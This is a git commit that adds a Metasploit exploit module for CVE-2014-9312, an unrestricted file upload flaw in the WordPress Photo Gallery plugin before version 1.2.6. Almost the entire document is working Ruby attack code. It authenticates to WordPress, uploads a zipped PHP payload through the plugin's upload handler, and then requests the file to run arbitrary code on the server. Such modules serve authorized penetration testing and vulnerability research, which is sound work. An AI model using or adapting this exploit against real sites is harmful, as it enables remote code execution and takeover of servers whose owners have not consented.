Add WordPress Photo Gallery upload module

bug/bundler_fix
rastating 2015-02-11 01:03:51 +00:00
parent 73435c6d1c
commit 80a086d5f6
1 changed files with 116 additions and 0 deletions

View File

@ -0,0 +1,116 @@
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
require 'json'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Photo Gallery 1.2.5 Unrestricted File Upload',
'Description' => %q{Photo Gallery Plugin for WordPress contains a flaw that allows a
remote attacker to execute arbitrary PHP code. This flaw exists
because the photo-gallery\photo-gallery.php script allows access
to filemanager\UploadHandler.php. The post() method in UploadHandler.php
does not properly verify or sanitize user-uploaded files.},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['OSVDB', '117676'],
['WPVDB', '7769'],
['CVE', '2014-9312']
],
'DisclosureDate' => 'Nov 11 2014',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['photo-gallery < 1.2.6', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
], self.class)
end
def check
check_plugin_version_from_readme('photo-gallery', '1.2.6')
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def generate_mime_message(payload, name)
data = Rex::MIME::Message.new
zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
zip.add_file("#{name}.php", payload.encoded)
data.add_part(zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"files\"; filename=\"#{name}.zip\"")
data
end
def exploit
print_status("#{peer} - Authenticating using #{username}:#{password}...")
cookie = wordpress_login(username, password)
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
print_good("#{peer} - Authenticated with WordPress")
print_status("#{peer} - Preparing payload...")
payload_name = Rex::Text.rand_text_alpha(10)
uploader_url = normalize_uri(wordpress_url_admin_ajax, '?action=bwg_UploadHandler&dir=rce/')
data = generate_mime_message(payload, payload_name)
print_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => uploader_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie
)
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
print_good("#{peer} - Uploaded the payload")
print_status("#{peer} - Parsing server response...")
json = JSON.parse(res.body)
if json.nil? || !json['files']
fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
else
uploaded_name = json['files'][0]['name'][0..-5]
php_file_name = "#{uploaded_name}.php"
payload_url = normalize_uri(wordpress_url_backend, 'rce', uploaded_name, php_file_name)
print_good("#{peer} - Parsed response")
register_files_for_cleanup(php_file_name)
register_files_for_cleanup("../#{uploaded_name}.zip")
print_status("#{peer} - Executing the payload at #{payload_url}")
send_request_cgi(
{
'uri' => payload_url,
'method' => 'GET'
}, 5)
print_good("#{peer} - Executed payload")
end
end
end